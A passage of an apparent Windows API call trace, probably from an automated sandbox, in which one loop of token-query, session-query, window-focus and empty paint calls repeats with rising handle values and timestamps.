hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.907] TextOutW (hdc=0x0, x=614, y=1299, lpString="", c=0) returned 1 [0220.907] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.907] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.907] GetTickCount () returned 0xe290 [0220.910] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.910] SetForegroundWindow (hWnd=0x0) returned 0 [0220.910] BringWindowToTop (hWnd=0x0) returned 0 [0220.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x320) returned 1 [0220.910] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.910] GetLastError () returned 0x7a [0220.910] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.910] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.916] WTSFreeMemory (pMemory=0x0) [0220.916] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.917] TextOutW (hdc=0x0, x=624, y=1324, lpString="", c=0) returned 1 [0220.917] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.917] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.917] GetTickCount () returned 0xe2af [0220.918] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.918] SetForegroundWindow (hWnd=0x0) returned 0 [0220.918] BringWindowToTop (hWnd=0x0) returned 0 [0220.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x324) returned 1 [0220.918] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.918] GetLastError () returned 0x7a [0220.918] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.918] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.919] WTSFreeMemory (pMemory=0x0) [0220.919] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.919] TextOutW (hdc=0x0, x=634, y=1349, lpString="", c=0) returned 1 [0220.919] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.919] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.919] GetTickCount () returned 0xe2af [0220.920] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.920] SetForegroundWindow (hWnd=0x0) returned 0 [0220.920] BringWindowToTop (hWnd=0x0) returned 0 [0220.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x328) returned 1 [0220.920] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.920] GetLastError () returned 0x7a [0220.920] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.920] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.921] WTSFreeMemory (pMemory=0x0) [0220.921] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.921] TextOutW (hdc=0x0, x=644, y=1374, lpString="", c=0) returned 1 [0220.921] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.921] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.921] GetTickCount () returned 0xe2af [0220.921] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.921] SetForegroundWindow (hWnd=0x0) returned 0 [0220.921] BringWindowToTop (hWnd=0x0) returned 0 [0220.922] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x32c) returned 1 [0220.922] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.922] GetLastError () returned 0x7a [0220.922] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.922] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.922] WTSFreeMemory (pMemory=0x0) [0220.922] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.922] TextOutW (hdc=0x0, x=654, y=1399, lpString="", c=0) returned 1 [0220.922] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.922] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.922] GetTickCount () returned 0xe2af [0220.923] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.923] SetForegroundWindow (hWnd=0x0) returned 0 [0220.923] BringWindowToTop (hWnd=0x0) returned 0 [0220.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x330) returned 1 [0220.923] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.923] GetLastError () returned 0x7a [0220.923] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.923] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.924] WTSFreeMemory (pMemory=0x0) [0220.924] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.924] TextOutW (hdc=0x0, x=664, y=1424, lpString="", c=0) returned 1 [0220.924] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.924] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.924] GetTickCount () returned 0xe2af [0220.925] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.925] SetForegroundWindow (hWnd=0x0) returned 0 [0220.925] BringWindowToTop (hWnd=0x0) returned 0 [0220.925] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x334) returned 1 [0220.925] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.925] GetLastError () returned 0x7a [0220.926] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.926] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.926] WTSFreeMemory (pMemory=0x0) [0220.926] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.926] TextOutW (hdc=0x0, x=674, y=1449, lpString="", c=0) returned 1 [0220.926] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.926] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.926] GetTickCount () returned 0xe2af [0220.927] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.927] SetForegroundWindow (hWnd=0x0) returned 0 [0220.927] BringWindowToTop (hWnd=0x0) returned 0 [0220.928] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x338) returned 1 [0220.928] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.928] GetLastError () returned 0x7a [0220.928] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.928] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.928] WTSFreeMemory (pMemory=0x0) [0220.928] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.928] TextOutW (hdc=0x0, x=684, y=1474, lpString="", c=0) returned 1 [0220.928] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.928] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.929] GetTickCount () returned 0xe2af [0220.930] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.930] SetForegroundWindow (hWnd=0x0) returned 0 [0220.930] BringWindowToTop (hWnd=0x0) returned 0 [0220.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x33c) returned 1 [0220.930] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.930] GetLastError () returned 0x7a [0220.930] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.930] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.931] WTSFreeMemory (pMemory=0x0) [0220.931] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.931] TextOutW (hdc=0x0, x=694, y=1499, lpString="", c=0) returned 1 [0220.931] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.931] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.931] GetTickCount () returned 0xe2af [0220.931] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.931] SetForegroundWindow (hWnd=0x0) returned 0 [0220.931] BringWindowToTop (hWnd=0x0) returned 0 [0220.932] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x340) returned 1 [0220.932] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.932] GetLastError () returned 0x7a [0220.932] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.932] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.932] WTSFreeMemory (pMemory=0x0) [0220.932] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.932] TextOutW (hdc=0x0, x=704, y=1524, lpString="", c=0) returned 1 [0220.932] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.933] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.933] GetTickCount () returned 0xe2af [0220.933] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.933] SetForegroundWindow (hWnd=0x0) returned 0 [0220.933] BringWindowToTop (hWnd=0x0) returned 0 [0220.933] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x344) returned 1 [0220.933] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.933] GetLastError () returned 0x7a [0220.933] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.933] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.934] WTSFreeMemory (pMemory=0x0) [0220.934] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.934] TextOutW (hdc=0x0, x=714, y=1549, lpString="", c=0) returned 1 [0220.934] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.934] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.934] GetTickCount () returned 0xe2af [0220.935] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.935] SetForegroundWindow (hWnd=0x0) returned 0 [0220.935] BringWindowToTop (hWnd=0x0) returned 0 [0220.935] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x348) returned 1 [0220.935] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.935] GetLastError () returned 0x7a [0220.935] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.935] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.936] WTSFreeMemory (pMemory=0x0) [0220.936] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.936] TextOutW (hdc=0x0, x=724, y=1574, lpString="", c=0) returned 1 [0220.936] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.936] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.936] GetTickCount () returned 0xe2af [0220.937] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.937] SetForegroundWindow (hWnd=0x0) returned 0 [0220.937] BringWindowToTop (hWnd=0x0) returned 0 [0220.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x34c) returned 1 [0220.937] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.937] GetLastError () returned 0x7a [0220.937] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.937] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.938] WTSFreeMemory (pMemory=0x0) [0220.938] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.938] TextOutW (hdc=0x0, x=734, y=1599, lpString="", c=0) returned 1 [0220.938] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.938] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.938] GetTickCount () returned 0xe2af [0220.941] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.941] SetForegroundWindow (hWnd=0x0) returned 0 [0220.941] BringWindowToTop (hWnd=0x0) returned 0 [0220.942] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x350) returned 1 [0220.942] GetTokenInformation (in: TokenHandle=0x350, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.942] GetLastError () returned 0x7a [0220.942] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.942] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.947] WTSFreeMemory (pMemory=0x0) [0220.947] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.947] TextOutW (hdc=0x0, x=744, y=1624, lpString="", c=0) returned 1 [0220.947] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.947] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.947] GetTickCount () returned 0xe2be [0220.948] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.948] SetForegroundWindow (hWnd=0x0) returned 0 [0220.948] BringWindowToTop (hWnd=0x0) returned 0 [0220.948] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x354) returned 1 [0220.948] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.948] GetLastError () returned 0x7a [0220.948] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.948] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.949] WTSFreeMemory (pMemory=0x0) [0220.949] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.949] TextOutW (hdc=0x0, x=754, y=1649, lpString="", c=0) returned 1 [0220.949] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.949] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.949] GetTickCount () returned 0xe2be [0220.951] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.951] SetForegroundWindow (hWnd=0x0) returned 0 [0220.951] BringWindowToTop (hWnd=0x0) returned 0 [0220.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x358) returned 1 [0220.951] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.951] GetLastError () returned 0x7a [0220.951] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.951] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.952] WTSFreeMemory (pMemory=0x0) [0220.952] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.952] TextOutW (hdc=0x0, x=764, y=1674, lpString="", c=0) returned 1 [0220.952] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.952] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.952] GetTickCount () returned 0xe2be [0220.952] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.952] SetForegroundWindow (hWnd=0x0) returned 0 [0220.953] BringWindowToTop (hWnd=0x0) returned 0 [0220.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x35c) returned 1 [0220.953] GetTokenInformation (in: TokenHandle=0x35c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.953] GetLastError () returned 0x7a [0220.953] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.953] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.953] WTSFreeMemory (pMemory=0x0) [0220.953] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.953] TextOutW (hdc=0x0, x=774, y=1699, lpString="", c=0) returned 1 [0220.953] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.954] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.954] GetTickCount () returned 0xe2be [0220.954] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.954] SetForegroundWindow (hWnd=0x0) returned 0 [0220.955] BringWindowToTop (hWnd=0x0) returned 0 [0220.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x360) returned 1 [0220.955] GetTokenInformation (in: TokenHandle=0x360, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.955] GetLastError () returned 0x7a [0220.955] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.955] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.955] WTSFreeMemory (pMemory=0x0) [0220.955] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.955] TextOutW (hdc=0x0, x=784, y=1724, lpString="", c=0) returned 1 [0220.955] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.956] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.956] GetTickCount () returned 0xe2be [0220.980] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.980] SetForegroundWindow (hWnd=0x0) returned 0 [0220.981] BringWindowToTop (hWnd=0x0) returned 0 [0220.981] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x364) returned 1 [0220.981] GetTokenInformation (in: TokenHandle=0x364, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.981] GetLastError () returned 0x7a [0220.981] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.981] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.981] WTSFreeMemory (pMemory=0x0) [0220.981] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.982] TextOutW (hdc=0x0, x=794, y=1749, lpString="", c=0) returned 1 [0220.982] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.982] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.982] GetTickCount () returned 0xe2de [0221.003] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.004] SetForegroundWindow (hWnd=0x0) returned 0 [0221.004] BringWindowToTop (hWnd=0x0) returned 0 [0221.004] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x368) returned 1 [0221.004] GetTokenInformation (in: TokenHandle=0x368, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.004] GetLastError () returned 0x7a [0221.004] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.004] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.022] WTSFreeMemory (pMemory=0x0) [0221.022] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.023] TextOutW (hdc=0x0, x=804, y=1774, lpString="", c=0) returned 1 [0221.023] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.023] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.023] GetTickCount () returned 0xe30d [0221.026] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.026] SetForegroundWindow (hWnd=0x0) returned 0 [0221.026] BringWindowToTop (hWnd=0x0) returned 0 [0221.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x36c) returned 1 [0221.026] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.026] GetLastError () returned 0x7a [0221.026] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.026] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.027] WTSFreeMemory (pMemory=0x0) [0221.027] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.027] TextOutW (hdc=0x0, x=814, y=1799, lpString="", c=0) returned 1 [0221.027] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.027] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 